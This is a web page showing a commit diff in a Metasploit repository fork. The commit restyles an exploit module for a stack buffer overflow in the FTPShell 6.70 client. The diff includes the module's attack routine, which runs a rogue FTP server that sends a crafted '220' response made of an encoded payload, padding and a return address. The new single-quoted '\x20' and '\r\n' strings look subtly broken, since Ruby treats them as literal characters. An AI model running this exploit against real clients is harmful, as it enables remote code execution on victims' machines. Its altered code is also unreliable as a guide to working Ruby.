adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update ftpshell_cli_bof.rb

Browse Source
This commit is contained in:
Daniel Teixeira
2018-06-28 12:55:48 +01:00
committed by GitHub
parent 837427ccae
commit bd2fb56adf
1 changed files with 9 additions and 12 deletions
Download Patch File Download Diff File Expand all files Collapse all files
modules/exploits/windows/ftp/ftpshell_cli_bof.rb
+9 -12
View File
@@ -14,13 +14,13 @@ class MetasploitModule < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise edition) allowing remote
code execution.
This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise
edition) allowing remote code execution.
},
'Author' =>
[
'r4wd3r', # Original exploit author
'Daniel Teixeira <danieljcrteixeira[at]gmail.com>' # MSF module author
'r4wd3r', # Original exploit author
'Daniel Teixeira' # MSF module author
],
'License' => MSF_LICENSE,
'References' =>
@@ -45,13 +45,10 @@ class MetasploitModule < Msf::Exploit::Remote
'SRVHOST' => '0.0.0.0',
'EXITFUNC' => 'thread'
},
'DisclosureDate' => 'May 15 2017',
'DisclosureDate' => 'March 4 2017',
'DefaultTarget' => 0))
register_options(
[
OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ])
])
register_options [ OptPort.new('SRVPORT', [ true, 'The FTP port to listen on', 21 ]) ]
end
def exploit
@@ -94,11 +91,11 @@ class MetasploitModule < Msf::Exploit::Remote
res = client.get_once.to_s.strip
print_status("#{client.peerhost} - Request: #{res}")
sploit = "220 \""
sploit = '220 "'
sploit << payload.encoded
sploit << "\x20"*(400-payload.encoded.length)
sploit << '\x20' * (payload_space - payload.encoded.length)
sploit << target.ret
sploit << "\" is current directory\r\n"
sploit << '" is current directory\r\n'
print_status("#{client.peerhost} - Request: Sending the malicious response")
client.put(sploit)